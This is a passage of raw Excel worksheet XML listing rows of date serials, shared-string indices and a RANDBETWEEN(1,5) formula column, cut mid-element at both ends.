      </c>
      <c r="D1699" t="s">
        <v>89</v>
      </c>
      <c r="E1699" t="s">
        <v>1773</v>
      </c>
      <c r="F1699">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1700" s="1">
        <v>43525.669675925928</v>
      </c>
      <c r="B1700" t="s">
        <v>5</v>
      </c>
      <c r="C1700" t="s">
        <v>6</v>
      </c>
      <c r="D1700" t="s">
        <v>821</v>
      </c>
      <c r="E1700" t="s">
        <v>1774</v>
      </c>
      <c r="F1700">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1701" s="1">
        <v>43525.669664351852</v>
      </c>
      <c r="B1701" t="s">
        <v>5</v>
      </c>
      <c r="C1701" t="s">
        <v>6</v>
      </c>
      <c r="D1701" t="s">
        <v>821</v>
      </c>
      <c r="E1701" t="s">
        <v>1774</v>
      </c>
      <c r="F1701">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1702" s="1">
        <v>43525.666354166664</v>
      </c>
      <c r="B1702" t="s">
        <v>19</v>
      </c>
      <c r="C1702" t="s">
        <v>10</v>
      </c>
      <c r="D1702" t="s">
        <v>178</v>
      </c>
      <c r="E1702" t="s">
        <v>1775</v>
      </c>
      <c r="F1702">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1703" s="1">
        <v>43525.627569444441</v>
      </c>
      <c r="B1703" t="s">
        <v>9</v>
      </c>
      <c r="C1703" t="s">
        <v>10</v>
      </c>
      <c r="D1703" t="s">
        <v>251</v>
      </c>
      <c r="E1703" t="s">
        <v>1776</v>
      </c>
      <c r="F1703">
        <f t="shared" ca="1" si="26"/>
        <v>3</v>
      </c>
    </row>
    <row r="1704" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1704" s="1">
        <v>43525.614178240743</v>
      </c>
      <c r="B1704" t="s">
        <v>19</v>
      </c>
      <c r="C1704" t="s">
        <v>10</v>
      </c>
      <c r="D1704" t="s">
        <v>36</v>
      </c>
      <c r="E1704" s="2" t="s">
        <v>1777</v>
      </c>
      <c r="F1704">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1705" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1705" s="1">
        <v>43525.61310185185</v>
      </c>
      <c r="B1705" t="s">
        <v>13</v>
      </c>
      <c r="C1705" t="s">
        <v>10</v>
      </c>
      <c r="D1705" t="s">
        <v>11</v>
      </c>
      <c r="E1705" s="2" t="s">
        <v>1778</v>
      </c>
      <c r="F1705">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1706" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1706" s="1">
        <v>43525.613113425927</v>
      </c>
      <c r="B1706" t="s">
        <v>13</v>
      </c>
      <c r="C1706" t="s">
        <v>10</v>
      </c>
      <c r="D1706" t="s">
        <v>11</v>
      </c>
      <c r="E1706" s="2" t="s">
        <v>1778</v>
      </c>
      <c r="F1706">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1707" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1707" s="1">
        <v>43525.607951388891</v>
      </c>
      <c r="B1707" t="s">
        <v>5</v>
      </c>
      <c r="C1707" t="s">
        <v>6</v>
      </c>
      <c r="D1707" t="s">
        <v>194</v>
      </c>
      <c r="E1707" s="2" t="s">
        <v>1779</v>
      </c>
      <c r="F1707">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1708" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1708" s="1">
        <v>43525.603252314817</v>
      </c>
      <c r="B1708" t="s">
        <v>35</v>
      </c>
      <c r="C1708" t="s">
        <v>6</v>
      </c>
      <c r="D1708" t="s">
        <v>67</v>
      </c>
      <c r="E1708" s="2" t="s">
        <v>1780</v>
      </c>
      <c r="F1708">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1709" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1709" s="1">
        <v>43525.584641203706</v>
      </c>
      <c r="B1709" t="s">
        <v>13</v>
      </c>
      <c r="C1709" t="s">
        <v>6</v>
      </c>
      <c r="D1709" t="s">
        <v>194</v>
      </c>
      <c r="E1709" s="2" t="s">
        <v>1781</v>
      </c>
      <c r="F1709">
        <f t="shared" ca="1" si="26"/>
        <v>3</v>
      </c>
    </row>
    <row r="1710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1710" s="1">
        <v>43525.583483796298</v>
      </c>
      <c r="B1710" t="s">
        <v>19</v>
      </c>
      <c r="C1710" t="s">
        <v>10</v>
      </c>
      <c r="D1710" t="s">
        <v>36</v>
      </c>
      <c r="E1710" t="s">
        <v>1782</v>
      </c>
      <c r="F1710">
        <f t="shared" ca="1" si="26"/>
        <v>3</v>
      </c>
    </row>
    <row r="1711" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1711" s="1">
        <v>43525.574837962966</v>
      </c>
      <c r="B1711" t="s">
        <v>19</v>
      </c>
      <c r="C1711" t="s">
        <v>16</v>
      </c>
      <c r="E1711" s="2" t="s">
        <v>1783</v>
      </c>
      <c r="F1711">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1712" s="1">
        <v>43525.517708333333</v>
      </c>
      <c r="B1712" t="s">
        <v>5</v>
      </c>
      <c r="C1712" t="s">
        <v>6</v>
      </c>
      <c r="D1712" t="s">
        <v>25</v>
      </c>
      <c r="E1712" t="s">
        <v>1784</v>
      </c>
      <c r="F1712">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1713" s="1">
        <v>43525.515798611108</v>
      </c>
      <c r="B1713" t="s">
        <v>5</v>
      </c>
      <c r="C1713" t="s">
        <v>6</v>
      </c>
      <c r="D1713" t="s">
        <v>25</v>
      </c>
      <c r="E1713" t="s">
        <v>1784</v>
      </c>
      <c r="F1713">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1714" s="1">
        <v>43525.489189814813</v>
      </c>
      <c r="B1714" t="s">
        <v>13</v>
      </c>
      <c r="C1714" t="s">
        <v>10</v>
      </c>
      <c r="D1714" t="s">
        <v>89</v>
      </c>
      <c r="E1714" t="s">
        <v>1785</v>
      </c>
      <c r="F1714">
        <f t="shared" ca="1" si="26"/>
        <v>2</v>
      </c>
    </row>
    <row r="1715" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1715" s="1">
        <v>43525.488206018519</v>
      </c>
      <c r="B1715" t="s">
        <v>13</v>
      </c>
      <c r="C1715" t="s">
        <v>10</v>
      </c>
      <c r="D1715" t="s">
        <v>80</v>
      </c>
      <c r="E1715" s="2" t="s">
        <v>1786</v>
      </c>
      <c r="F1715">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1716" s="1">
        <v>43525.472430555557</v>
      </c>
      <c r="B1716" t="s">
        <v>35</v>
      </c>
      <c r="C1716" t="s">
        <v>41</v>
      </c>
      <c r="F1716">
        <f t="shared" ca="1" si="26"/>
        <v>5</v>
      </c>
    </row>
    <row r="1717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1717" s="1">
        <v>43525.465497685182</v>
      </c>
      <c r="B1717" t="s">
        <v>1305</v>
      </c>
      <c r="C1717" t="s">
        <v>10</v>
      </c>
      <c r="D1717" t="s">
        <v>89</v>
      </c>
      <c r="E1717" t="s">
        <v>1787</v>
      </c>
      <c r="F1717">
        <f t="shared" ca="1" si="26"/>
        <v>2</v>
      </c>
    </row>
    <row r="1718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1718" s="1">
        <v>43525.463159722225</v>
      </c>
      <c r="B1718" t="s">
        <v>19</v>
      </c>
      <c r="C1718" t="s">
        <v>10</v>
      </c>
      <c r="D1718" t="s">
        <v>14</v>
      </c>
      <c r="E1718" t="s">
        <v>1788</v>
      </c>
      <c r="F1718">
        <f t="shared" ca="1" si="26"/>
        <v>2</v>
      </c>
    </row>
    <row r="1719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1719" s="1">
        <v>43525.462569444448</v>
      </c>
      <c r="B1719" t="s">
        <v>9</v>
      </c>
      <c r="C1719" t="s">
        <v>173</v>
      </c>
      <c r="E1719" t="s">
        <v>1789</v>
      </c>
      <c r="F1719">
        <f t="shared" ca="1" si="26"/>
        <v>3</v>
      </c>
    </row>
    <row r="1720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1720" s="1">
        <v>43525.45685185185</v>
      </c>
      <c r="B1720" t="s">
        <v>5</v>
      </c>
      <c r="C1720" t="s">
        <v>10</v>
      </c>
      <c r="D1720" t="s">
        <v>112</v>
      </c>
      <c r="E1720" t="s">
        <v>1790</v>
      </c>
      <c r="F1720">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1721" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1721" s="1">
        <v>43525.456145833334</v>
      </c>
      <c r="B1721" t="s">
        <v>19</v>
      </c>
      <c r="C1721" t="s">
        <v>10</v>
      </c>
      <c r="D1721" t="s">
        <v>271</v>
      </c>
      <c r="E1721" s="2" t="s">
        <v>1791</v>
      </c>
      <c r="F1721">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1722" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1722" s="1">
        <v>43525.450335648151</v>
      </c>
      <c r="B1722" t="s">
        <v>13</v>
      </c>
      <c r="C1722" t="s">
        <v>10</v>
      </c>
      <c r="D1722" t="s">
        <v>36</v>
      </c>
      <c r="E1722" s="2" t="s">
        <v>1792</v>
      </c>
      <c r="F1722">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1723" s="1">
        <v>43525.433020833334</v>
      </c>
      <c r="B1723" t="s">
        <v>19</v>
      </c>
      <c r="C1723" t="s">
        <v>10</v>
      </c>
      <c r="D1723" t="s">
        <v>158</v>
      </c>
      <c r="E1723" t="s">
        <v>1793</v>
      </c>
      <c r="F1723">
        <f t="shared" ca="1" si="26"/>
        <v>2</v>
      </c>
    </row>
    <row r="1724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1724" s="1">
        <v>43525.41547453704</v>
      </c>
      <c r="B1724" t="s">
        <v>5</v>
      </c>
      <c r="C1724" t="s">
        <v>10</v>
      </c>
      <c r="D1724" t="s">
        <v>17</v>
      </c>
      <c r="E1724" t="s">
        <v>1794</v>
      </c>
      <c r="F1724">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1725" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1725" s="1">
        <v>43525.395300925928</v>
      </c>
      <c r="B1725" t="s">
        <v>13</v>
      </c>
      <c r="C1725" t="s">
        <v>10</v>
      </c>
      <c r="D1725" t="s">
        <v>89</v>
      </c>
      <c r="E1725" s="2" t="s">
        <v>1795</v>
      </c>
      <c r="F1725">
        <f t="shared" ca="1" si="26"/>
        <v>3</v>
      </c>
    </row>
    <row r="1726" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1726" s="1">
        <v>43525.390567129631</v>
      </c>
      <c r="B1726" t="s">
        <v>35</v>
      </c>
      <c r="C1726" t="s">
        <v>258</v>
      </c>
      <c r="E1726" s="2" t="s">
        <v>1796</v>
      </c>
      <c r="F1726">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1727" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A1727" s="1">
        <v>43525.38821759259</v>
      </c>
      <c r="B1727" t="s">
        <v>19</v>
      </c>
      <c r="C1727" t="s">
        <v>10</v>
      </c>
      <c r="E1727" s="2" t="s">
        <v>1797</v>
      </c>
      <c r="F1727">
        <f t="shared" ca="1" si="26"/>
        <v>4</v>
      </c>
    </row>
    <row r="1728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1728" s="1">
        <v>43525.358773148146</v>
      </c>
      <c r="B1728" t="s">
        <v>5</v>
      </c>
      <c r="C1728" t="s">
        <v>16</v>
      </c>
      <c r="E1728" t="s">
        <v>1798</v>
      </c>
      <c r="F1728">
        <f t="shared" ca="1" si="26"/>
        <v>2</v>
      </c>
    </row>
    <row r="1729" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1729" s="1">
        <v>43525.35193287037</v>
      </c>
      <c r="B1729" t="s">
        <v>35</v>
      </c>
      <c r="C1729" t="s">
        <v>461</v>
      </c>
      <c r="E1729" s="2" t="s">
        <v>1799</v>
      </c>
      <c r="F1729">
        <f t="shared" ca="1" si="26"/>
        <v>1</v>
      </c>
    </row>
    <row r="1730" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1730" s="1">
        <v>43525.347719907404</v>
      </c>
      <c r="B1730" t="s">
        <v>5</v>
      </c>
      <c r="C1730" t="s">
        <v>10</v>
      </c>
      <c r="E1730" s="2" t="s">
        <v>1800</v>
      </c>
      <c r="F1730">
        <f t="shared" ref="F1730:F1793" ca="1" si="27">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="1731" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1731" s="1">
        <v>43525.345682870371</v>
      </c>
      <c r="B1731" t="s">
        <v>5</v>
      </c>
      <c r="C1731" t="s">
        <v>16</v>
      </c>
      <c r="E1731" s="2" t="s">
        <v>1801</v>
      </c>
      <c r="F1731">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1732" s="1">
        <v>43525.318842592591</v>
      </c>
      <c r="B1732" t="s">
        <v>5</v>
      </c>
      <c r="C1732" t="s">
        <v>10</v>
      </c>
      <c r="D1732" t="s">
        <v>17</v>
      </c>
      <c r="E1732" t="s">
        <v>1802</v>
      </c>
      <c r="F1732">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1733" s="1">
        <v>43525.307349537034</v>
      </c>
      <c r="B1733" t="s">
        <v>19</v>
      </c>
      <c r="C1733" t="s">
        <v>10</v>
      </c>
      <c r="D1733" t="s">
        <v>163</v>
      </c>
      <c r="E1733" t="s">
        <v>1803</v>
      </c>
      <c r="F1733">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1734" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1734" s="1">
        <v>43525.280231481483</v>
      </c>
      <c r="B1734" t="s">
        <v>13</v>
      </c>
      <c r="C1734" t="s">
        <v>124</v>
      </c>
      <c r="E1734" s="2" t="s">
        <v>1804</v>
      </c>
      <c r="F1734">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1735" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1735" s="1">
        <v>43525.280115740738</v>
      </c>
      <c r="B1735" t="s">
        <v>13</v>
      </c>
      <c r="C1735" t="s">
        <v>124</v>
      </c>
      <c r="E1735" s="2" t="s">
        <v>1804</v>
      </c>
      <c r="F1735">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1736" s="1">
        <v>43525.280081018522</v>
      </c>
      <c r="B1736" t="s">
        <v>19</v>
      </c>
      <c r="C1736" t="s">
        <v>41</v>
      </c>
      <c r="E1736" t="s">
        <v>1805</v>
      </c>
      <c r="F1736">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1737" s="1">
        <v>43525.263912037037</v>
      </c>
      <c r="B1737" t="s">
        <v>13</v>
      </c>
      <c r="C1737" t="s">
        <v>10</v>
      </c>
      <c r="D1737" t="s">
        <v>112</v>
      </c>
      <c r="F1737">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1738" s="1">
        <v>43525.248981481483</v>
      </c>
      <c r="B1738" t="s">
        <v>5</v>
      </c>
      <c r="C1738" t="s">
        <v>41</v>
      </c>
      <c r="E1738" t="s">
        <v>1806</v>
      </c>
      <c r="F1738">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1739" s="1">
        <v>43525.236168981479</v>
      </c>
      <c r="B1739" t="s">
        <v>5</v>
      </c>
      <c r="C1739" t="s">
        <v>301</v>
      </c>
      <c r="E1739" t="s">
        <v>1807</v>
      </c>
      <c r="F1739">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1740" s="1">
        <v>43525.22246527778</v>
      </c>
      <c r="B1740" t="s">
        <v>13</v>
      </c>
      <c r="C1740" t="s">
        <v>226</v>
      </c>
      <c r="E1740" t="s">
        <v>1808</v>
      </c>
      <c r="F1740">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1741" s="1">
        <v>43525.222407407404</v>
      </c>
      <c r="B1741" t="s">
        <v>13</v>
      </c>
      <c r="C1741" t="s">
        <v>226</v>
      </c>
      <c r="E1741" t="s">
        <v>1808</v>
      </c>
      <c r="F1741">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1742" s="1">
        <v>43525.222337962965</v>
      </c>
      <c r="B1742" t="s">
        <v>13</v>
      </c>
      <c r="C1742" t="s">
        <v>226</v>
      </c>
      <c r="E1742" t="s">
        <v>1808</v>
      </c>
      <c r="F1742">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1743" s="1">
        <v>43525.218287037038</v>
      </c>
      <c r="B1743" t="s">
        <v>19</v>
      </c>
      <c r="C1743" t="s">
        <v>471</v>
      </c>
      <c r="E1743" t="s">
        <v>1809</v>
      </c>
      <c r="F1743">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1744" s="1">
        <v>43525.203796296293</v>
      </c>
      <c r="B1744" t="s">
        <v>35</v>
      </c>
      <c r="C1744" t="s">
        <v>189</v>
      </c>
      <c r="E1744" t="s">
        <v>1810</v>
      </c>
      <c r="F1744">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1745" s="1">
        <v>43525.110868055555</v>
      </c>
      <c r="B1745" t="s">
        <v>13</v>
      </c>
      <c r="C1745" t="s">
        <v>41</v>
      </c>
      <c r="E1745" t="s">
        <v>1811</v>
      </c>
      <c r="F1745">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1746" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1746" s="1">
        <v>43525.106296296297</v>
      </c>
      <c r="B1746" t="s">
        <v>19</v>
      </c>
      <c r="C1746" t="s">
        <v>1812</v>
      </c>
      <c r="E1746" s="2" t="s">
        <v>1813</v>
      </c>
      <c r="F1746">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1747" s="1">
        <v>43525.08766203704</v>
      </c>
      <c r="B1747" t="s">
        <v>5</v>
      </c>
      <c r="C1747" t="s">
        <v>41</v>
      </c>
      <c r="E1747" t="s">
        <v>1814</v>
      </c>
      <c r="F1747">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1748" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1748" s="1">
        <v>43525.012337962966</v>
      </c>
      <c r="B1748" t="s">
        <v>19</v>
      </c>
      <c r="C1748" t="s">
        <v>10</v>
      </c>
      <c r="D1748" t="s">
        <v>46</v>
      </c>
      <c r="E1748" s="2" t="s">
        <v>1815</v>
      </c>
      <c r="F1748">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1749" s="1">
        <v>43524.965300925927</v>
      </c>
      <c r="B1749" t="s">
        <v>5</v>
      </c>
      <c r="C1749" t="s">
        <v>139</v>
      </c>
      <c r="E1749" t="s">
        <v>1816</v>
      </c>
      <c r="F1749">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1750" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1750" s="1">
        <v>43524.961886574078</v>
      </c>
      <c r="B1750" t="s">
        <v>19</v>
      </c>
      <c r="C1750" t="s">
        <v>41</v>
      </c>
      <c r="E1750" s="2" t="s">
        <v>1817</v>
      </c>
      <c r="F1750">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1751" s="1">
        <v>43524.961041666669</v>
      </c>
      <c r="B1751" t="s">
        <v>5</v>
      </c>
      <c r="C1751" t="s">
        <v>139</v>
      </c>
      <c r="E1751" t="s">
        <v>1818</v>
      </c>
      <c r="F1751">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1752" s="1">
        <v>43524.961018518516</v>
      </c>
      <c r="B1752" t="s">
        <v>5</v>
      </c>
      <c r="C1752" t="s">
        <v>139</v>
      </c>
      <c r="E1752" t="s">
        <v>1818</v>
      </c>
      <c r="F1752">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1753" s="1">
        <v>43524.955625000002</v>
      </c>
      <c r="B1753" t="s">
        <v>9</v>
      </c>
      <c r="C1753" t="s">
        <v>10</v>
      </c>
      <c r="D1753" t="s">
        <v>6</v>
      </c>
      <c r="E1753" t="s">
        <v>1819</v>
      </c>
      <c r="F1753">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1754" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1754" s="1">
        <v>43524.877916666665</v>
      </c>
      <c r="B1754" t="s">
        <v>19</v>
      </c>
      <c r="C1754" t="s">
        <v>140</v>
      </c>
      <c r="D1754" t="s">
        <v>46</v>
      </c>
      <c r="E1754" s="2" t="s">
        <v>1820</v>
      </c>
      <c r="F1754">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1755" s="1">
        <v>43524.871145833335</v>
      </c>
      <c r="B1755" t="s">
        <v>19</v>
      </c>
      <c r="C1755" t="s">
        <v>10</v>
      </c>
      <c r="D1755" t="s">
        <v>367</v>
      </c>
      <c r="E1755" t="s">
        <v>1821</v>
      </c>
      <c r="F1755">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1756" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1756" s="1">
        <v>43524.792650462965</v>
      </c>
      <c r="B1756" t="s">
        <v>19</v>
      </c>
      <c r="C1756" t="s">
        <v>140</v>
      </c>
      <c r="D1756" t="s">
        <v>234</v>
      </c>
      <c r="E1756" s="2" t="s">
        <v>1822</v>
      </c>
      <c r="F1756">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1757" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1757" s="1">
        <v>43524.763923611114</v>
      </c>
      <c r="B1757" t="s">
        <v>5</v>
      </c>
      <c r="C1757" t="s">
        <v>260</v>
      </c>
      <c r="E1757" s="2" t="s">
        <v>1823</v>
      </c>
      <c r="F1757">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1758" s="1">
        <v>43524.76358796296</v>
      </c>
      <c r="B1758" t="s">
        <v>13</v>
      </c>
      <c r="C1758" t="s">
        <v>10</v>
      </c>
      <c r="D1758" t="s">
        <v>17</v>
      </c>
      <c r="E1758" t="s">
        <v>1824</v>
      </c>
      <c r="F1758">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1759" s="1">
        <v>43524.754699074074</v>
      </c>
      <c r="B1759" t="s">
        <v>13</v>
      </c>
      <c r="C1759" t="s">
        <v>10</v>
      </c>
      <c r="D1759" t="s">
        <v>6</v>
      </c>
      <c r="E1759" t="s">
        <v>1825</v>
      </c>
      <c r="F1759">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1760" s="1">
        <v>43524.751331018517</v>
      </c>
      <c r="B1760" t="s">
        <v>1305</v>
      </c>
      <c r="C1760" t="s">
        <v>10</v>
      </c>
      <c r="D1760" t="s">
        <v>11</v>
      </c>
      <c r="E1760" t="s">
        <v>1826</v>
      </c>
      <c r="F1760">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1761" s="1">
        <v>43524.741342592592</v>
      </c>
      <c r="B1761" t="s">
        <v>1305</v>
      </c>
      <c r="C1761" t="s">
        <v>10</v>
      </c>
      <c r="D1761" t="s">
        <v>1160</v>
      </c>
      <c r="E1761" t="s">
        <v>1827</v>
      </c>
      <c r="F1761">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1762" s="1">
        <v>43524.735833333332</v>
      </c>
      <c r="B1762" t="s">
        <v>5</v>
      </c>
      <c r="C1762" t="s">
        <v>260</v>
      </c>
      <c r="F1762">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1763" s="1">
        <v>43524.721736111111</v>
      </c>
      <c r="B1763" t="s">
        <v>9</v>
      </c>
      <c r="C1763" t="s">
        <v>6</v>
      </c>
      <c r="D1763" t="s">
        <v>114</v>
      </c>
      <c r="E1763" t="s">
        <v>1828</v>
      </c>
      <c r="F1763">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1764" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1764" s="1">
        <v>43524.710486111115</v>
      </c>
      <c r="B1764" t="s">
        <v>13</v>
      </c>
      <c r="C1764" t="s">
        <v>10</v>
      </c>
      <c r="D1764" t="s">
        <v>1160</v>
      </c>
      <c r="E1764" t="s">
        <v>1829</v>
      </c>
      <c r="F1764">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1765" s="1">
        <v>43524.705659722225</v>
      </c>
      <c r="B1765" t="s">
        <v>19</v>
      </c>
      <c r="C1765" t="s">
        <v>10</v>
      </c>
      <c r="D1765" t="s">
        <v>494</v>
      </c>
      <c r="E1765" t="s">
        <v>1830</v>
      </c>
      <c r="F1765">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1766" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A1766" s="1">
        <v>43524.688969907409</v>
      </c>
      <c r="B1766" t="s">
        <v>13</v>
      </c>
      <c r="C1766" t="s">
        <v>10</v>
      </c>
      <c r="D1766" t="s">
        <v>89</v>
      </c>
      <c r="E1766" s="2" t="s">
        <v>1831</v>
      </c>
      <c r="F1766">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1767" s="1">
        <v>43524.664884259262</v>
      </c>
      <c r="B1767" t="s">
        <v>13</v>
      </c>
      <c r="C1767" t="s">
        <v>10</v>
      </c>
      <c r="D1767" t="s">
        <v>20</v>
      </c>
      <c r="E1767" t="s">
        <v>1832</v>
      </c>
      <c r="F1767">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1768" s="1">
        <v>43524.652430555558</v>
      </c>
